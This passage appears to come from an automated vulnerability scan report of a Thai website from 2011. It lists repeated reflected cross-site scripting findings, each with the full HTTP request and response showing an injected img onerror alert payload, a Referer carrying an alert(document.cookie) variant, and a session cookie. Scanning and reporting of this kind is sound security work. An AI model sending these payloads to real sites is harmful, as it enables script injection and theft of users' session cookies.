Host:   http://www.ktam.co.th
Path:   /en/index.php/declarationnav.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5d8d"><img%20src%3da%20onerror%3dalert(1)>faa0c6bef0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5d8d\"><img src=a onerror=alert(1)>faa0c6bef0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/declarationnav.php/b5d8d"><img%20src%3da%20onerror%3dalert(1)>faa0c6bef0f HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:48 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29513

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b5d8d\"><img src=a onerror=alert(1)>faa0c6bef0f" title="THAI">
...[SNIP]...

5.82. http://www.ktam.co.th/en/index.php/ims/ads_csi300_2.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/ads_csi300_2.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c49d7"><img%20src%3da%20onerror%3dalert(1)>6f99f2df67 was submitted in the REST URL parameter 4. This input was echoed as c49d7\"><img src=a onerror=alert(1)>6f99f2df67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/ads_csi300_2.gifc49d7"><img%20src%3da%20onerror%3dalert(1)>6f99f2df67 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:23 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29528

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/ads_csi300_2.gifc49d7\"><img src=a onerror=alert(1)>6f99f2df67" title="THAI">
...[SNIP]...

5.83. http://www.ktam.co.th/en/index.php/ims/b_ktam_news11.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news11.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a103d"><img%20src%3da%20onerror%3dalert(1)>6d31d68549b was submitted in the REST URL parameter 4. This input was echoed as a103d\"><img src=a onerror=alert(1)>6d31d68549b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_ktam_news11.gifa103d"><img%20src%3da%20onerror%3dalert(1)>6d31d68549b HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:18 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29530

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_ktam_news11.gifa103d\"><img src=a onerror=alert(1)>6d31d68549b" title="THAI">
...[SNIP]...

5.84. http://www.ktam.co.th/en/index.php/ims/b_ktam_news12.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news12.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e95fd"><img%20src%3da%20onerror%3dalert(1)>3b594682de3 was submitted in the REST URL parameter 4. This input was echoed as e95fd\"><img src=a onerror=alert(1)>3b594682de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_ktam_news12.gife95fd"><img%20src%3da%20onerror%3dalert(1)>3b594682de3 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:29 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29530

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_ktam_news12.gife95fd\"><img src=a onerror=alert(1)>3b594682de3" title="THAI">
...[SNIP]...

5.85. http://www.ktam.co.th/en/index.php/ims/b_ktam_news13.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news13.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b80a"><img%20src%3da%20onerror%3dalert(1)>1842f6f998e was submitted in the REST URL parameter 4. This input was echoed as 8b80a\"><img src=a onerror=alert(1)>1842f6f998e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_ktam_news13.gif8b80a"><img%20src%3da%20onerror%3dalert(1)>1842f6f998e HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:04 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29530

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_ktam_news13.gif8b80a\"><img src=a onerror=alert(1)>1842f6f998e" title="THAI">
...[SNIP]...

5.86. http://www.ktam.co.th/en/index.php/ims/b_ktam_news21.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news21.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e76"><img%20src%3da%20onerror%3dalert(1)>a1278aa297d was submitted in the REST URL parameter 4. This input was echoed as 35e76\"><img src=a onerror=alert(1)>a1278aa297d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_ktam_news21.gif35e76"><img%20src%3da%20onerror%3dalert(1)>a1278aa297d HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:06 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29530

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_ktam_news21.gif35e76\"><img src=a onerror=alert(1)>a1278aa297d" title="THAI">
...[SNIP]...

5.87. http://www.ktam.co.th/en/index.php/ims/b_ktam_news22.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news22.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d1c7"><img%20src%3da%20onerror%3dalert(1)>c2f0f509d8a was submitted in the REST URL parameter 4. This input was echoed as 9d1c7\"><img src=a onerror=alert(1)>c2f0f509d8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_ktam_news22.gif9d1c7"><img%20src%3da%20onerror%3dalert(1)>c2f0f509d8a HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:30 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29530

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_ktam_news22.gif9d1c7\"><img src=a onerror=alert(1)>c2f0f509d8a" title="THAI">
...[SNIP]...

5.88. http://www.ktam.co.th/en/index.php/ims/b_ktam_news23.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news23.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a605"><img%20src%3da%20onerror%3dalert(1)>6666c083050 was submitted in the REST URL parameter 4. This input was echoed as 5a605\"><img src=a onerror=alert(1)>6666c083050 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_ktam_news23.gif5a605"><img%20src%3da%20onerror%3dalert(1)>6666c083050 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:17 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29530

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_ktam_news23.gif5a605\"><img src=a onerror=alert(1)>6666c083050" title="THAI">
...[SNIP]...

5.89. http://www.ktam.co.th/en/index.php/ims/b_nav11.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav11.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29f86"><img%20src%3da%20onerror%3dalert(1)>35c95f69899 was submitted in the REST URL parameter 4. This input was echoed as 29f86\"><img src=a onerror=alert(1)>35c95f69899 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_nav11.gif29f86"><img%20src%3da%20onerror%3dalert(1)>35c95f69899 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:10 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_nav11.gif29f86\"><img src=a onerror=alert(1)>35c95f69899" title="THAI">
...[SNIP]...

5.90. http://www.ktam.co.th/en/index.php/ims/b_nav12.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav12.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 116c6"><img%20src%3da%20onerror%3dalert(1)>1c67b90e00f was submitted in the REST URL parameter 4. This input was echoed as 116c6\"><img src=a onerror=alert(1)>1c67b90e00f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_nav12.gif116c6"><img%20src%3da%20onerror%3dalert(1)>1c67b90e00f HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:28 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_nav12.gif116c6\"><img src=a onerror=alert(1)>1c67b90e00f" title="THAI">
...[SNIP]...

5.91. http://www.ktam.co.th/en/index.php/ims/b_nav13.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav13.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd1c1"><img%20src%3da%20onerror%3dalert(1)>a9ad0d65c41 was submitted in the REST URL parameter 4. This input was echoed as fd1c1\"><img src=a onerror=alert(1)>a9ad0d65c41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_nav13.giffd1c1"><img%20src%3da%20onerror%3dalert(1)>a9ad0d65c41 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:16 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_nav13.giffd1c1\"><img src=a onerror=alert(1)>a9ad0d65c41" title="THAI">
...[SNIP]...

5.92. http://www.ktam.co.th/en/index.php/ims/b_nav21.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav21.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a41c"><img%20src%3da%20onerror%3dalert(1)>27d7fb1ea05 was submitted in the REST URL parameter 4. This input was echoed as 4a41c\"><img src=a onerror=alert(1)>27d7fb1ea05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_nav21.gif4a41c"><img%20src%3da%20onerror%3dalert(1)>27d7fb1ea05 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:16 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_nav21.gif4a41c\"><img src=a onerror=alert(1)>27d7fb1ea05" title="THAI">
...[SNIP]...

5.93. http://www.ktam.co.th/en/index.php/ims/b_nav22.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav22.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57968"><img%20src%3da%20onerror%3dalert(1)>640f5a655e8 was submitted in the REST URL parameter 4. This input was echoed as 57968\"><img src=a onerror=alert(1)>640f5a655e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_nav22.gif57968"><img%20src%3da%20onerror%3dalert(1)>640f5a655e8 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:30 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_nav22.gif57968\"><img src=a onerror=alert(1)>640f5a655e8" title="THAI">
...[SNIP]...

5.94. http://www.ktam.co.th/en/index.php/ims/b_nav23.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav23.gif

Issue detail

